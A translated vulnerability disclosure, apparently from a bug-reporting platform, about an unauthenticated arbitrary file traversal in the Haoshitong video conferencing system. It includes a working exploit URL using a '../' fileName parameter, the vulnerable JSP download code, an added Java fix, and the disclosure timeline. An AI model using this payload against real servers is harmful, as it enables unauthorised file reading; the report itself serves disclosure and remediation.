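2015-10-06: Details reported to the vendor; awaiting vendor handling
2015-10-12: Vendor confirmed; details disclosed to the vendor only
2015-10-15: Details opened to third-party security partners (NSFOCUS (绿盟科技), 唐朝安全巡航)
2015-12-06: Details disclosed to core white hats and experts in related fields
2015-12-16: Details disclosed to regular white hats
2015-12-26: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public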
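As in the title.
Haoshitong (好视通) enterprise video conferencing system has an arbitrary file traversal (no login required). How it is exploited:
http://<address>/dbbackup/adminMgr/download.jsp?fileName=../../dbbackup/adminMgr/download.jsp
Source code: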
<%@ page language="java" import="**.**.**.**.*" import="**.**.**.**.*" import="com.backup.util.*" pageEncoding="utf-8"%>
<%@ taglib uri="http://**.**.**.**/tags-bean" prefix="bean" %>
<%@ taglib uri="http://**.**.**.**/tags-html" prefix="html" %>
<%@ taglib uri="http://**.**.**.**/tags-logic" prefix="logic" %>
<%@ taglib uri="http://**.**.**.**/tags-tiles" prefix="tiles" %>
<%
String info="";
info = request.getParameter("info");
if(info==null)
{
    // File path
    String Path = ConfigMgr.getBackupPath()+"/";
    String filename = request.getParameter("fileName");
    int i = 0;
    // Work around garbled file names on download
    if (request.getHeader("User-Agent").toLowerCase().indexOf("firefox") > 0)
        filename = new String(filename.getBytes("UTF-8"), "ISO8859-1"); // Firefox browser
    else if (request.getHeader("User-Agent").toUpperCase().indexOf("MSIE") > 0)
        filename = URLEncoder.encode(filename, "UTF-8"); // IE browser
    response.reset();
    response.setContentType("application/octet-stream");
    response.setHeader("Content-Disposition","attachment;filename = "+filename);
    // The user-supplied fileName is appended to the backup path unchecked (the traversal)
    **.**.**.**.FileInputStream fileInputStream = new **.**.**.**.FileInputStream(Path+filename);
    while((i= fileInputStream.read()) != -1){
        out.write(i);
    }
}
else if(info.endsWith("export"))
{
    String filename = request.getParameter("filename");
    // File path
    String Path = ConfigMgr.getExportPath();
    int i = 0;
    // Work around garbled file names on download
    if (request.getHeader("User-Agent").toLowerCase().indexOf("firefox") > 0)
        filename = new String(filename.getBytes("UTF-8"), "ISO8859-1"); // Firefox browser
    else if (request.getHeader("User-Agent").toUpperCase().indexOf("MSIE") > 0)
        filename = URLEncoder.encode(filename, "UTF-8"); // IE browser
    response.setContentType("application/octet-stream");
    response.setHeader("Content-Disposition","attachment;filename = "+filename);
    **.**.**.**.FileInputStream fileInputStream = new **.**.**.**.FileInputStream(Path+filename);
    OutputStream os = response.getOutputStream();
    while((i= fileInputStream.read()) != -1){
        os.write(i);
    }
    out.clear();
    out = pageContext.pushBody();
}
%>
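One way to close the traversal in the download handler above, shown as an added example (not the vendor's code and not part of the original report): canonicalize the requested name against the backup directory and reject anything that resolves outside it. The class and method names are hypothetical, baseDir stands in for the value of ConfigMgr.getBackupPath(), and the sample files and requests are constructed; the missing login check has to be fixed separately.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class SafeDownloadResolver {

    /**
     * Resolve a client-supplied file name inside baseDir, or throw if the
     * result would fall outside it. baseDir is an assumption standing in
     * for ConfigMgr.getBackupPath() in the JSP.
     */
    static Path resolveInside(Path baseDir, String requested) throws IOException {
        if (requested == null || requested.isEmpty() || requested.indexOf('\0') >= 0) {
            throw new SecurityException("missing or malformed file name");
        }
        Path base = baseDir.toRealPath();                     // canonical base, symlinks resolved
        Path candidate = base.resolve(requested).normalize(); // collapses "../" segments
        if (!candidate.startsWith(base)) {                    // component-wise prefix check
            throw new SecurityException("path escapes backup directory");
        }
        Path real = candidate.toRealPath();                   // throws if missing; follows symlinks
        if (!real.startsWith(base) || !Files.isRegularFile(real)) {
            throw new SecurityException("not a regular file inside backup directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample layout: a temporary "backup" directory with one file.
        Path base = Files.createTempDirectory("backup");
        Files.write(base.resolve("db-2015-10-01.sql"), "dump".getBytes());

        String[] requests = {
            "db-2015-10-01.sql",                    // legitimate backup file
            "../../dbbackup/adminMgr/download.jsp", // fileName value from the report
            "/absolute/outside.txt",                // constructed absolute path
        };
        for (String r : requests) {
            try {
                System.out.println("ALLOW " + resolveInside(base, r));
            } catch (SecurityException | IOException e) {
                System.out.println("DENY  " + r + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The same check applies to the export branch, which concatenates the filename parameter onto ConfigMgr.getExportPath() in the same way.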
Cases:
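Vendor contact
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-10-12 10:41
CNVD confirmed and reproduced the reported issue, and has notified the software vendor by e-mail through the vendor's public contact channel; the vendor is to provide a fix and coordinate handling with the affected user organizations.
None at this time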